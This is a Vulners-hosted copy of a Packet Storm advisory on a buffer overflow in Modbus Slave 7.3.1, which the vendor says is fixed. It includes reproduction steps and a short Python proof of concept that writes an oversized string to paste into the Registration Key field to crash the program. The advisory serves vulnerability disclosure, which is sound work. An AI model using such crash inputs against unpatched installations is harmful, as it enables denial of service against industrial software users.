Lucene search
K

Modbus Slave 7.3.1 Buffer Overflow

🗓️ 22 Nov 2021 00:00:00Reported by Yehia ElghalyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 347 Views

Modbus Slave 7.3.1 Buffer Overflow on Window

Code
`Vendor has been notified and fixed  
https://www.modbustools.com/ModSlaveChangeLog.txt  
  
tested on: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64  
  
# Steps to reproduce:  
# 1. - Download and install Modbus Slave  
# 2. - Run the python script and it will create modbus.txt file.  
# 3. - Modbus Slave 7.3.1 < 7.4.2  
# 4. - Connection -> Connect  
# 5. - Paste the characters of txt file to Registration Key  
# 6. - press "ok" button  
# 7. - Crashed  
  
#!/usr/bin/python  
  
exploit = 'A' * 736  
  
try:  
file = open("Modbus.txt","w")  
file.write(exploit)  
file.close()  
  
print("POC is created")  
except:  
print("POC not created")  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Nov 2021 00:00Current
7.1High risk
Vulners AI Score7.1
347